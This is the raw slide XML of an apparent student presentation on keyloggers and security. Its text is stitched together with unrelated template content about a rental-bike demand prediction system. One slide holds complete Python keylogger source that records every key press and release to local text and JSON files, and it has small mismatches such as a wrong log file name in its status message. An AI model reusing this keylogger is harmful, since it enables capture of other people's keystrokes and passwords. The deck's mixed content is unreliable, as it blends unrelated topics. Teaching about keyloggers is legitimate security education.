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p:scale>
          <a:sx n="77" d="100"/>
          <a:sy n="77"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4/15/2024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8514181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0772118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1705759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1381526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9315212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5460696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5503195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5998576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2664812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428844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2335850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17522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showMasterSp="0" type="title" preserve="1">
  <p:cSld name="标题幻灯片">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2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2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2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16" name="矩形"/>
          <p:cNvSpPr>
            <a:spLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rot="0">
            <a:off x="446534" y="3085764"/>
            <a:ext cx="11298933" cy="3338149"/>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17" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rot="0">
            <a:off x="581191" y="1020431"/>
            <a:ext cx="10993550" cy="147501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18" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rot="0">
            <a:off x="581194" y="2495445"/>
            <a:ext cx="10993546" cy="59032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a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19"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4/15/2024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0"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1"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243506015"/>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0844114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6756525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9"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0"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4/15/2024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21191499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5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5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5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46" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rot="0">
            <a:off x="581193" y="729658"/>
            <a:ext cx="11029616" cy="49285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47" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rot="0">
            <a:off x="581193" y="1391479"/>
            <a:ext cx="5194767" cy="446957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48" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rot="0">
            <a:off x="6416039" y="1391479"/>
            <a:ext cx="5194768" cy="446957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49"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4/15/2024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0"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51"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575395322"/>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7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70"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69"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68"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64" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rot="0">
            <a:off x="575894" y="729658"/>
            <a:ext cx="11029616" cy="5922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65"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4/15/2024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6"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67"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25110691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6630895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4368369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5958078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6532825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3141166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3296693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9357746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7090569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4/15/2024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4" cy="365126"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2051323231"/>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6070" indent="-306070"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793" indent="-306070"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2060" indent="-234315"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2104" indent="-234315"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20027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K</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e</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y</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l</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o</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g</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g</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e</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r</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s</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 </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a</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n</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d</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 </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s</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e</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c</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u</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r</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i</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t</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y</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3117529" y="4586365"/>
            <a:ext cx="7980183" cy="681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1.</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VELMURUGAN. M</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KI</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NG</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S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EN</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GI</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NE</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ER</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ING C</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O</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L</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L</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E</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G</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E</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C</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S</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E</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52740135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6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70542896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2"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01151440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7"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pitchFamily="0"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(Technology Used)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0525118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39"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Example:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="28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64202917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1"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Collection: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Gather historical data on bike rentals, including time, date, location, and other relevant factors.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Utilize real-time data sources, such as weather conditions, events, and holidays, to enhance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Preprocessing:</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Clean and preprocess the collected data to handle missing values, outliers, and inconsistencies.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Feature engineering to extract relevant features from the data that might impact bike demand.</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Machine Learning Algorithm:</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Consider incorporating other factors like weather conditions, day of the week, and special events to improve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Deployment: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Develop a user-friendly interface or application that provides real-time predictions for bike counts at different hours.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 the solution on a scalable and reliable platform, considering factors like server infrastructure, response time, and user accessibility.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Evaluation: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Assess the model's performance using appropriate metrics such as Mean Absolute Error (MAE), Root Mean Squared Error (RMSE), or other relevant metrics.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Fine-tune the model based on feedback and continuous monitoring of prediction accuracy.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"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Franklin Gothic Book" pitchFamily="0" charset="0"/>
                <a:cs typeface="Franklin Gothic Book" pitchFamily="0" charset="0"/>
              </a:rPr>
              <a:t>Result:</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6405148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4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pitchFamily="0" charset="0"/>
                <a:ea typeface="Franklin Gothic Book" pitchFamily="0" charset="0"/>
                <a:cs typeface="Franklin Gothic Book" pitchFamily="0" charset="0"/>
              </a:rPr>
              <a:t>The "System Approach" section outlines the overall strategy and methodology for developing and implementing the rental bike prediction system. Here's a suggested structure for this section:</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a:rPr>
              <a:t>System requirements</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:srgbClr val="0F0F0F"/>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a:rPr>
              <a:t>Library required to build the model</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:srgbClr val="0F0F0F"/>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70077887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In the Algorithm section, describe the machine learning algorithm chosen for predicting bike counts. Here's an example structure for this section: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Algorithm Selection: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Provide a brief overview of the chosen algorithm (e.g., time-series forecasting model, like ARIMA or LSTM) and justify its selection based on the problem statement and data characteristics.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Data Input:</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Specify the input features used by the algorithm, such as historical bike rental data, weather conditions, day of the week, and any other relevant factors.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Training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Explain how the algorithm is trained using historical data. Highlight any specific considerations or techniques employed, such as cross-validation or hyperparameter tuning.</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Prediction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Detail how the trained algorithm makes predictions for future bike counts. Discuss any real-time data inputs considered during the prediction phase.</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9114342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6" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="581193" y="729658"/>
            <a:ext cx="11029616" cy="492855"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:solidFill>
            <a:srgbClr val="02A5E3"/>
          </a:solidFill>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:round/>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a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="all" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Demi" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="all" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Demi" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="all" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Demi" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="all" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Demi" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="all" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Demi" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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7" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="295836" y="1601516"/>
            <a:ext cx="5194767" cy="4469572"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr" anchorCtr="0">
            <a:prstTxWarp prst="textNoShape"/>
          </a:bodyPr>
          <a:lstStyle/>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import tkinter as tk</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from tkinter import *</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from pynput import keyboard</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import json</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keys_used = []</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flag = False</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keys = ""</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def generate_text_log(key):</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with open('key_log.txt', "w+") as keys:</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keys.write(key)</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def generate_json_file(keys_used):</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with open('key_log.json', '+wb') as key_log:</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key_list_bytes = json.dumps(keys_used).encode()</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key_log.write(key_list_bytes)</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def on_press(key):</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global flag, keys_used, keys</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if flag == False:</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keys_used.append(</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{'Pressed': f'{key}'}</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flag = True</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if flag == True:</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keys_used.append(</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{'Held': f'{key}'}</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generate_json_file(keys_used)</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def on_release(key):</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global flag, keys_used, keys</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keys_used.append(</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{'Released': f'{key}'}</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if flag == True:</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flag = False</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generate_json_file(keys_used)</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keys = keys + str(key)</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generate_text_log(str(keys))</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def start_keylogger():</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global listener</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listener = keyboard.Listener(on_press=on_press, on_release=on_release)</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listener.start()</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label.config(text="[+] Keylogger is running!\n[!] Saving the keys in 'keylogger.txt'")</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start_button.config(state='disabled')</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stop_button.config(state='normal')</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def stop_keylogger():</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global listener</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listener.stop()</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label.config(text="Keylogger stopped.")</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start_button.config(state='normal')</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stop_button.config(state='disabled')</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root = Tk()</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root.title("Keylogger")</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label = Label(root, text='Click "Start" to begin keylogging.')</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label.config(anchor=CENTER)</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label.pack()</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start_button = Button(root, text="Start", command=start_keylogger)</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start_button.pack(side=LEFT)</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stop_button = Button(root, text="Stop", command=stop_keylogger, state='disabled')</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stop_button.pack(side=RIGHT)</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root.geometry("250x250")</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root.mainloop()</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="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76548284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9"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45504649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0"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61"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8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8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924968559"/>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Keyloggers and security</dc:title>
  <dc:creator>Vaibhav Ostwal</dc:creator>
  <cp:lastModifiedBy>root</cp:lastModifiedBy>
  <cp:revision>0</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-04-09T06:27:22Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-15T02:56:41Z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y fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="ICV">
    <vt:lpwstr>7a7c519ad0554087ba2849901c103f39</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="KSOProductBuildVer">
    <vt:lpwstr>1033-0.0.0.0</vt:lpwstr>
  </property>
</Properties>
</file>